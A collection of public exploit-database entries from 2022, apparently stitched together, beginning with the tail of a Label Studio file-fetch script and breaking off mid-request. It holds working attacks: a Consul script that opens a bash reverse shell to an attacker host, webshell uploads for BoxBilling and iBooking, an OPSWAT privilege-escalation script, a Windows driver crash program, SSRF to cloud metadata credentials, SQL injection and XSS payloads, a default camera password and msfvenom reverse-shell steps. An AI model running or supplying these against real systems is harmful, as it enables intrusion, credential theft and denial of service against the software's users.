parser = argparse.ArgumentParser()
_options = [
    ("--url", dict(required=True, help="Label Studio URL")),
    ("--file", dict(required=True, help="Path to the file you want to fetch")),
    ("--out", dict(required=False, help="Path to write the file. If omitted will be written to STDOUT")),
    ("--username", dict(required=False, help="Username for existing account (email)")),
    ("--password", dict(required=False, help="Password for existing account")),
    # BooleanOptionalAction also provides --no-register (Python 3.9+)
    ("--register", dict(required=False, action=argparse.BooleanOptionalAction,
                        help="Register user if it doesn't exist")),
]
for flag, options in _options:
    parser.add_argument(flag, **options)
args = parser.parse_args()
main(args.url, args.file, args.out, args.username, args.password, args.register)
# Exploit Title: BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)
# Date: 2022-09-18
# Exploit Author: zetc0de
# Vendor Homepage: https://www.boxbilling.org/
# Software Link:
https://github.com/boxbilling/boxbilling/releases/download/4.22.1.5/BoxBilling.zip
# Version: <=4.22.1.5 (Latest)
# Tested on: Windows 10
# CVE : CVE-2022-3552
# BoxBilling was vulnerable to Unrestricted File Upload.
# In order to exploit the vulnerability, an attacker must have a valid
authenticated session as admin on the CMS.
# With at least 1 product order, an attacker can upload a malicious file containing
a webshell to a hidden API endpoint and get RCE
###################################################################################
## POC
POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1
Host: local.com:8089
Content-Length: 52
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=3nrf9i4mv28o5anva77ltq042d
Connection: close
order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f>
POC Video :
https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8_Hjx/view?usp=sharing
# Exploit Title: Tapo C310 RTSP server v1.3.0- Unauthorised Video Stream Access
# Date: 19th July 2022
# Exploit Author: dsclee1
# Vendor Homepage: tp-link.com
# Software Link: http://download.tplinkcloud.com/firmware/Tapo_C310v1_en_1.3.0_Build_220328_Rel.64283n_u_1649923652150.bin
# Version: 1.3.0
# Tested on: Linux – running on camera
# CVE : CVE-2022-37255
These Tapo cameras work via an app. There is a facility on the app to set up a “Camera Account”, which adds user details for the RTSP server. Unfortunately if you don’t set up the user details on versions 1.3.0 and below there are default login details. I sourced these from the “cet” binary on the camera.
You can gain unauthorised access to the RTSP stream using the following user details:
User: ---
Password: TPL075526460603
# Exploit Title: SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path
# Exploit Author: Jorge Manuel Lozano Gómez
# Date: 2022-10-20
# Vendor Homepage: https://www1.sugarsync.com
# Software Link: https://www1.sugarsync.com/apps/windows/
# Version : 4.1.3
# Tested on: Windows 11 64bit
# CVE : N/A
About Unquoted Service Path :
==============================
When a service is created whose executable path contains spaces and is not enclosed within quotes, this leads to a vulnerability known as Unquoted Service Path, which allows a user to gain SYSTEM privileges
(only if the vulnerable service is running with SYSTEM privilege level, which most of the time it is).
Description:
==============================
SugarSync installs a service with an unquoted service path.
To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
# PoC
===========
1. Open CMD and check for the vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
2. The vulnerable service would show up.
3. Check the service permissions by typing [ sc qc "SugarSync Service" ]
4. The command would return..
C:\>sc qc "SugarSync Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SugarSync Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\SugarSync\SugarSyncSvc.exe
LOAD_ORDER_GROUP :
TAG : 0
ISPLAY_NAME : SugarSync Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
5. This concludes that the service is running as SYSTEM.
6. Now create a payload with msfvenom or other tools and name it to SugarSyncSvc.exe.
7. Make sure you have write permissions to "C:\Program Files (x86)\SugarSync" directory.
8. Provided that you have right permissions, drop the SugarSyncSvc.exe executable you created into the "C:\Program Files (x86)\SugarSync" directory.
9. Start a listener.
9. Now restart the SugarSync service by giving the command [ sc stop "SugarSync Service" ] followed by [ sc start "SugarSync Service" ]
9.1 If you cannot stop and start the service, since the service is of type "AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ] and get the shell when the service starts automatically.
10. Got shell.
During my testing :
Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o SugarSyncSvc.exe
# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
# Exploit Title: Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)
# Date: 2022-08-10
# Exploit Author: Sinem Şahin
# Vendor Homepage: https://intelliants.com/
# Version: 4.2.1
# Tested on: Windows & XAMPP
==> Tutorial <==
1- Go to the following url. => http://(HOST)/panel/fields/add
2- Write XSS Payload into the tooltip value of the field add page.
3- Press "Save" button.
4- Go to the following url. => http://(HOST)/panel/members/add
XSS Payload ==> "<script>alert("field_tooltip_XSS")</script>
Reference: https://github.com/intelliants/subrion/issues/895
// Exploit Title: Tunnel Interface Driver - Denial of Service
// Date: 07/15/2022
// Exploit Author: ExAllocatePool2
// Vendor Homepage: https://www.microsoft.com/
// Software Link: https://www.microsoft.com/en-us/software-download/windows10
// Version: Windows 10 Pro Version 21H2 (OS Build 19044.1288)
// Tested on: Microsoft Windows
// GitHub Repository: https://github.com/Exploitables/MSRC-1
#include <Windows.h>
#include <stdio.h>
#define TARGET_DEVICE "\\\\.\\GLOBALROOT\\Device\\TunnelControl"
int main(int argc, char** argv);
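int main(int argc, char** argv)
{
    /* 0x80 is FILE_READ_ATTRIBUTES: the device is opened without requesting
     * data read/write access (same access mask as the original PoC, which
     * presumably lets a standard user obtain the handle -- confirm on target). */
    HANDLE h_driver = CreateFileA(TARGET_DEVICE, 0x80, 0, 0, OPEN_EXISTING, 0, 0);
    /* One 8-byte buffer serves as both input and output of the IOCTL; the
     * 0x42/0x43 fillers only make the values recognisable in a crash dump. */
    unsigned long long input_output = 0x4242424242424242;
    unsigned long bytes_returned = 0x43434343;
    DWORD last_error = 0;
    BOOL ioctl_ok;

    SetConsoleTitleA("https://msrc.microsoft.com/");
    printf("[*] Microsoft Security and Response Center Report #1\n[*] Microsoft Tunnel Interface Driver Null Pointer Dereference Denial of Service Vulnerability\n[*] Exploit written by ExAllocatePool2\n[!] Let's exploit!");

    if (h_driver == INVALID_HANDLE_VALUE)
    {
        /* Read the error code once so both format arguments show the same value. */
        last_error = GetLastError();
        printf("\n[-] Failed to obtain a handle to the vulnerable device driver. Error: %lu (0x%lx)", last_error, last_error);
        (void)getchar();
        return 1;
    }
    printf("\n[+] Obtained a handle to the vulnerable device driver. Handle Value: 0x%p", h_driver);

    /* Short countdown so the operator can abort before the box goes down. */
    printf("\n[!] Triggering a denial of service via arbitrary read in 3...");
    for (int i = 2; i > 0; i--)
    {
        Sleep(1000);
        printf("\n[!] %d...", i);
    }

    /* IOCTL code 0 with the 8-byte buffer as both in and out. On an affected
     * build this call does not return: per the report title the driver
     * dereferences a NULL pointer and the machine bugchecks. Everything below
     * only runs when that did not happen, so report why instead of waiting
     * for a keypress before saying anything. */
    ioctl_ok = DeviceIoControl(h_driver, 0, &input_output, 8, &input_output, 8, &bytes_returned, 0);
    if (!ioctl_ok)
    {
        last_error = GetLastError();
        printf("\n[-] DeviceIoControl failed. Error: %lu (0x%lx)", last_error, last_error);
    }
    else
    {
        printf("\n[-] DeviceIoControl returned (%lu bytes).", bytes_returned);
    }
    printf("\n[-] Exploit failed. The machine should have crashed.");

    CloseHandle(h_driver);
    (void)getchar();
    return 0;
}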
# Exploit Title: OPSWAT Metadefender Core - Privilege Escalation
# Date: 24 October 2022
# Exploit Author: Ulascan Yildirim
# Vendor Homepage: https://www.opswat.com/
# Version: Metadefender Core 4.21.1
# Tested on: Windows / Linux
# CVE : CVE-2022-32272
# =============================================================================
# This is a PoC for the Metadefender Core Privilege escalation vulnerability.
# To use this PoC, you need a Username & Password.
# The OMS_CSRF_TOKEN allows users to execute commands with higher privileges.
# =============================================================================
#!/usr/bin/env python3
import requests
import json
from getpass import getpass
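def extract_session(login_response: dict) -> tuple[str, str]:
    """Return ``(oms_csrf_token, session_id)`` from the decoded ``/login`` body.

    Raises KeyError when either key is absent, which is what a rejected login
    looks like: the body then carries an error instead of the token pair.
    """
    return login_response["oms_csrf_token"], login_response["session_id"]


def main() -> None:
    """Log in as a low-privileged user and grant that same user the admin role.

    The ``/login`` reply hands back an ``oms_csrf_token`` and a ``session_id``.
    A ``PUT /user`` carrying both plus the body ``{"roles": ["1"]}`` is then
    accepted, apparently without the server checking that the caller may
    assign roles (CVE-2022-32272). Credentials are read interactively; the
    password via getpass so it is not echoed.

    Exits with status 1 (message on stderr) when the login is rejected or its
    body lacks the token/session pair, instead of dying with a KeyError.
    """
    url = input("Enter URL in this Format (http://website.com): ").rstrip("/")
    username = input("Username: ")
    password = getpass("Password: ")

    login_data = {"user": username, "password": password}
    response_login = requests.post(url + "/login", json=login_data, timeout=30)
    if response_login.status_code != 200:
        raise SystemExit(f"Login failed: HTTP {response_login.status_code}")
    try:
        token, session = extract_session(response_login.json())
    except (ValueError, KeyError) as err:
        # ValueError: body is not JSON; KeyError: JSON without the two fields.
        raise SystemExit(f"Login response did not contain oms_csrf_token/session_id: {err!r}")

    headers = {"oms_csrf_token": token}
    cookies = {"session_id_ometascan": session}
    # Role id "1" was the admin role on the tested 4.21.1 build -- verify it on
    # the target, role ids are not guaranteed to match elsewhere. The body is
    # sent as a raw string with no Content-Type header, exactly as the
    # original PoC did.
    payload = '{"roles": ["1"]}'
    response = requests.put(url + "/user", headers=headers, cookies=cookies, data=payload, timeout=30)

    print("Response status code: " + str(response.status_code))
    if response.status_code == 200:
        print("Exploit Successful!")
    else:
        print("Exploit Unsuccessful")


if __name__ == "__main__":
    main()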
# Exploit Title: ZKTeco ZEM/ZMM 8.88 - Missing Authentication
# Exploit Author: RedTeam Pentesting GmbH
# CVE: CVE-2022-42953
Advisory: Missing Authentication in ZKTeco ZEM/ZMM Web Interface
The ZKTeco time attendance device does not require authentication to use the
web interface, exposing the database of employees and their credentials.
Details
=======
Product: ZKTeco ZEM500-510-560-760, ZEM600-800, ZEM720, ZMM
Affected Versions: potentially versions below 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720) and 15.00 (ZMM200-220-210)
Fixed Versions: firmware version 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720), firmware version 15.00 (ZMM200-220-210)
Vulnerability Type: Missing Authentication
Security Risk: medium
Vendor URL: https://zkteco.eu/company/history
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-003
Advisory Status: published
CVE: CVE-2022-42953
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42953
Introduction
============
"Time attendance and workforce management is an integrated set of
processes that an institution uses to optimize the productivity of its
employees on the individual, departmental, and entity-wide levels.
ZKTeco has been at the forefront of time attendance solutions for the
last 30 years, integrating advanced biometric technologies with
innovative and versatile terminals." (from company website)
More Details
============
The ZKTeco ZEM/ZMM device allows to store a list of users and their credentials
which may be used to log into the device to prove the users' attendance. These
credentials can either be a PIN, a card for a variety of card readers, or a
fingerprint. The user list can be managed through the web interface.
When opening the web interface, for example on http://192.0.2.1/,
the web server of the device sends a Set-Cookie header for a cookie with
name and value similar to the following:
-----------------------------------------------------------------------
Set-Cookie: SessionID=1624553126; path=/;
-----------------------------------------------------------------------
It was determined that the value of the cookie is roughly the number of
seconds since January 1, 1970. Since the value has a constant offset,
that might allow attackers to guess the cookie value. After setting the
cookie, the webserver redirects the browser to "/csl/login". The login
form provided at this URL has its form action set to "/csl/check". If
the user provides wrong credentials, the web server responds with an
error message. If the user provides correct credentials, the server
responds with a frameset.
In this frameset various options are available, for example a user list.
The list contains a link titled "Options" for each user item which
references a URL similar to the following
http://192.0.2.1/csl/user?did=0&uid=123
Additionally, backups of all settings of the device can be downloaded
from the backup page. The request to do so looks similar to the
following:
-----------------------------------------------------------------------
POST /form/DataApp HTTP/1.1
Host: 192.0.2.1
User-Agent: Mozilla/5.0
Cookie: SessionID=1624553126
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Origin: http://192.0.2.1
Referer: http://192.0.2.1/form/Device?act=11
style=1
-----------------------------------------------------------------------
When the value "1" is given for the field named "style", the web server
responds with the file "device.dat" (corresponding to the option "Backup
System Data" in the web interface), for all other values the server
responds with the file "data.dat" (corresponding to the option "Backup
User Data" in the web interface). Both files can not only be requested
using HTTP-POST, but also using HTTP-GET with the following URLs:
http://192.0.2.1/form/DataApp?style=1
http://192.0.2.1/form/DataApp?style=0
Both files are - even though it's not obvious from the filename -
compressed tar archives. They can be extracted in the following way:
-----------------------------------------------------------------------
$ mv data.dat data.tgz
$ tar xvzf data.tgz
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/group.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/htimezone.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/lockgroup.dat
rwxrwxrwx 500/513 10512 2021-06-23 07:23 mnt/mtdblock/ssruser.dat
rwxr-xr-x root/root 819896 2021-06-18 07:23 mnt/mtdblock/tempinfo.dat
rwxrwxrwx 500/513 19456 2005-05-05 07:05 mnt/mtdblock/template.dat
rw-r--r-- root/root 360448 2021-06-18 07:23 mnt/mtdblock/templatev10.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/timezone.dat
rwxrwxrwx 500/513 1372 2005-05-05 07:25 mnt/mtdblock/user.dat
rwxr-xr-x root/root 120 1970-01-01 01:08 mnt/mtdblock/data/alarm.dat
rwxr-xr-x root/root 0 2021-06-23 09:55 mnt/mtdblock/data/extlog.dat
rwxr-xr-x root/root 0 2013-05-04 01:28 mnt/mtdblock/data/extuser.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/group.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/htimezone.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/lockgroup.dat
rwxr-xr-x root/root 54800 2021-06-23 09:55 mnt/mtdblock/data/oplog.dat
rwxr-xr-x root/root 33200 2021-06-23 07:23 mnt/mtdblock/data/sms.dat
rwxr-xr-x root/root 0 2021-06-23 09:55 mnt/mtdblock/data/ssrattlog.dat
rwxr-xr-x root/root 660 2018-11-09 17:28 mnt/mtdblock/data/stkey.dat
rwxrwxrwx 500/513 0 2013-05-04 01:28 mnt/mtdblock/data/template.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/timezone.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/transaction.dat
rwxr-xr-x root/root 952 2021-06-23 07:24 mnt/mtdblock/data/udata.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/user.dat
rwxr-xr-x root/root 0 2013-05-04 01:28 mnt/mtdblock/data/wkcd.dat
-----------------------------------------------------------------------
In this archive, the file "mnt/mtdblock/templatev10.dat" will likely
contain fingerprints, and the file "mnt/mtdblock/ssruser.dat" contains
the user database. The user database contains 72 byte user records, each
containing the privilege level, the PIN, the name of the user, data
stored on external authentication tokens like cards, and the group of
the user.
While the cookie value might be guessable, it is not used for
authentication purposes. An attacker with knowledge of the
corresponding URLs could access the user detail view or the backup
without any authentication.
Proof of Concept
================
http://192.0.2.1/form/DataApp?style=1
http://192.0.2.1/form/DataApp?style=0
http://192.0.2.1/csl/user?did=0&uid=123
Workaround
==========
Network access to the device should be limited to trustworthy persons, for
example by placing it in a dedicated network segment and filtering access to
its web interface (TCP port 80) at the network boundary. This might be hard to
implement if the device is installed in a public space, especially if it is
used for access control, too.
Fix
===
According to the vendor, firmware version 8.88 (ZEM500-510-560-760,
ZEM600-800, ZEM720) and 15.00 (ZMM200-220-210) fix this issue (see "Fixed
Versions" above and the 2021-08-20 timeline entry). Whether the fixed firmware
can be installed on every deployed device is not known; due to the age of the
product, devices that cannot be updated should rely on the workaround.
Security Risk
=============
Attackers with network access to a ZKTeco ZEM/ZMM time attendance device
can get access to employee data, including the credentials used for
accessing the time attendance device. If these credentials are used for
other purposes than time attendance, such as physical access control,
attackers might use them to gain access to protected areas. The actual
risk estimate varies wildly with the kind of access control system in
place and whether network access to the device is prevented by other
means, such as nearby security guards. For this reason, missing
authentication to the ZEM/ZMM web interface is estimated to pose a medium
risk. This estimate might need to be adjusted to the specific use case
of the device.
Timeline
========
2021-06-24 Vulnerability identified
2021-07-12 Customer approved disclosure to vendor
2021-07-16 Vendor notified
2021-08-20 Vendor provides fixed firmware
2022-09-29 Customer approved release of advisory
2022-10-10 CVE ID requested
2022-10-15 CVE ID assigned
2022-10-24 Advisory published
References
==========
https://zkteco.eu/company/history
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Alter Posthof 1 Fax : +49 241 510081-99
52062 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
#Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)
#Date: 24/10/2022
#Exploit Author: Hosein Vita & Milad Fadavvi
#Vendor Homepage: https://github.com/zalando/skipper
#Software Link: https://github.com/zalando/skipper
#Version: < v0.13.237
#Tested on: Linux
#CVE: CVE-2022-38580
Summary:
Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF) (the header above lists < v0.13.237; consult the linked GHSA advisory for the exact patched release). An attacker can exploit a vulnerable version of the proxy to reach the cloud instance metadata service or other unauthenticated internal URLs by adding a specific header (X-Skipper-Proxy) to the HTTP request: the proxy forwards the request to the URL given in that header.
Proof Of Concept:
1- Add header "X-Skipper-Proxy" to your request
2- Add the aws metadata to the path
GET /latest/meta-data/iam/security-credentials HTTP/1.1
Host: yourskipperdomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
X-Skipper-Proxy: http://169.254.169.254
Connection: close
Reference:
https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2
# Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting (XSS)
# Date: 26/10/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://moodle.org/
# Software Link: https://git.in.moodle.com/moodle
# Version: 4.0
# Tested on: XAMPP, Windows 10
# Contact: https://twitter.com/dmaral3noz
Description:
A Cross-Site Scripting (XSS) vulnerability exists in the course search page (course/search.php) of Moodle, a free and open-source Learning Management System (LMS) written in PHP and distributed under the GNU General Public License.
Vulnerable Code:
line 111 in file "course/search.php"
echo $courserenderer->search_courses($searchcriteria);
Steps to exploit:
1) Go to http://localhost/course/search.php
2) Insert your payload in the "search"
Proof of concept (Poc):
The following payload will allow you to run the javascript -
"><img src=# onerror=alert(document.cookie)>
## Title: Social-Share-Buttons v2.2.3 - SQL Injection
## Author: nu11secur1ty
## Date: 09.16.2022
## Vendor: https://wordpress.org/
## Software: https://downloads.wordpress.org/plugin/social-share-buttons-by-supsystic.2.2.3.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3
## Description:
The `project_id` parameter from the Social Share Buttons-2.2.3 on the
WordPress-6.0.2 system appears to be vulnerable to SQL injection
attacks.
A malicious user can dump the database of this system and misuse its
contents.
WARNING: The attacker can retrieve all-database from this system!
NOTE: The users of this system are NOT protected, this SQL
vulnerability is CRITICAL!
STATUS: HIGH Vulnerability
[+]Payload:
```mysql
---
Parameter: project_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=social-sharing-share&project_id=378116348' or
'3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=social-sharing-share&project_id=378116348' or
'3724'='3724' AND (SELECT 9167 FROM (SELECT(SLEEP(5)))dQDw) AND
'KWbC'='KWbC&network_id=5&post_id=
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3)
## Proof and Exploit:
[href](https://streamable.com/m9r76w)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: iBooking v1.0.8 - Arbitrary File Upload
# Exploit Author: d1z1n370/oPty
# Date: 01/11/2022
# Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088
# Tested on: Linux
# Version: 1.0.8
# Exploit Description:
The application is prone to an arbitrary file upload because the media upload endpoint (/dashboard/upload-new-media) evidently does not restrict the uploaded file's extension or verify its content: the request below stores a file named upload.php56 whose body is a GIF header followed by PHP code. An attacker can exploit this to upload arbitrary files in the context of the web server process and execute commands. Note that the request carries a valid session cookie and Laravel _token, so an authenticated dashboard user is required.
# PoC request
POST https://localhost/dashboard/upload-new-media HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/dashboard/settings
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062
Content-Length: 449
Connection: close
Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
-----------------------------115904534120015298741783774062
Content-Disposition: form-data; name="_token"
kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW
-----------------------------115904534120015298741783774062
Content-Disposition: form-data; name="is_modal"
1
-----------------------------115904534120015298741783774062
Content-Disposition: form-data; name="file"; filename="upload.php56"
Content-Type: image/gif
GIF89a;
<?php system($_GET['a']); phpinfo(); ?>
-----------------------------115904534120015298741783774062--
# Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)
# Date: 9 October 2022
# Exploit Author: Okan Kurtulus
# Vendor Homepage: https://reqlogic.com
# Version: 11.3
# Tested on: Linux
# CVE : CVE-2022-41441
# Proof of Concept:
1- Install ReQlogic v11.3
2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3
3- XSS is triggered when the payload is reflected unencoded in the POBatch and WaitDuration parameters (the leading </script> in the payload suggests the values are reflected inside an inline script block).
#XSS Payload:
</script><script>alert(1)</script>
#Affected Parameters
POBatch
WaitDuration
#Final URLs
http://localhost:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3
http://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>
# Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution (RCE)
# Date: 26/10/2022
# Exploit Author: GatoGamer1155, 0bfxgh0st
# Vendor Homepage: https://www.consul.io/
# Description: Exploit for gain reverse shell on Remote Command Execution via API
# References: https://www.consul.io/api/agent/service.html
# Tested on: Ubuntu Server
# Software Link: https://github.com/hashicorp/consul
import requests, sys
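def build_payload(lhost: str, lport: str) -> dict:
    """Return the service-registration body for ``PUT /v1/agent/service/register``.

    The interesting part is ``check.Args``: the agent runs a script health
    check by executing that argv, here a bash reverse shell to ``lhost:lport``.
    The long ``Timeout`` presumably keeps the shell process alive, and
    ``interval`` re-runs it (and so re-connects) every 10 s while the service
    stays registered.
    NOTE(review): the agent presumably executes ``Args`` checks only when
    script checks are enabled in its configuration -- confirm on the target.
    """
    return {
        "Address": "127.0.0.1",
        "check": {
            "Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"],
            "interval": "10s",
            "Timeout": "864000s",
        },
        "ID": "gato",
        "Name": "gato",
        "Port": 80,
    }


def main(argv: list[str]) -> int:
    """Register the malicious service and return the process exit status.

    ``argv`` is ``[script, rhost, rport, lhost, lport, acl_token]``.
    Unlike the original fire-and-forget PUT, the HTTP status is checked: an
    invalid or under-privileged ACL token yields a 4xx that must not be
    reported as "sent successfully". Only request-level failures are caught
    (the original bare ``except`` also swallowed KeyboardInterrupt).
    """
    if len(argv) < 6:
        print(f"\n[\033[1;31m-\033[1;37m] Usage: python3 {argv[0]} <rhost> <rport> <lhost> <lport> <acl_token>\n")
        return 1

    target = f"http://{argv[1]}:{argv[2]}/v1/agent/service/register"
    headers = {"X-Consul-Token": argv[5]}
    try:
        response = requests.put(target, headers=headers, json=build_payload(argv[3], argv[4]), timeout=10)
    except requests.RequestException:
        print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")
        return 1

    if response.ok:
        print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")
        return 0
    print(f"\n[\033[1;31m-\033[1;37m] Registration rejected: HTTP {response.status_code} {response.text.strip()}\n")
    return 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))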
## Title: Senayan Library Management System v9.5.0 - SQL Injection
## Author: nu11secur1ty
## Date: 11.03.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0
## Description:
The `keywords` parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the keywords parameter, and a general
error message was returned.
Two single quotes were then submitted and the error message disappeared,
which indicates that the input reaches a SQL query unescaped. The injection was confirmed manually by nu11secur1ty.
The attacker can retrieve all information from the database of this
system, by using this vulnerability.
## STATUS: HIGH Vulnerability
[+] Payload:
```MySQL
---
Parameter: keywords (GET)
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT
SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)
Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))
RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0)
## Proof and Exploit:
[href](https://streamable.com/63og5v)
## Time spent
`3:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 11.03.2022
## Vendor: https://www.rukovoditel.net/
## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1
## Description:
The application is vulnerable to DOM-based cross-site scripting attacks:
data is read from `location.hash` and passed to `jQuery.parseHTML`. Because
the payload travels in the URL fragment, it never reaches the server and does
not appear in the HTTP request below; it is evaluated entirely by the browser
on the restore_password page. The author additionally reports that the
vulnerability can be abused to create an unlimited number of accounts on the
system until it crashes.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Payload:
```http
GET /rukovoditel/index.php?module=users/restore_password HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
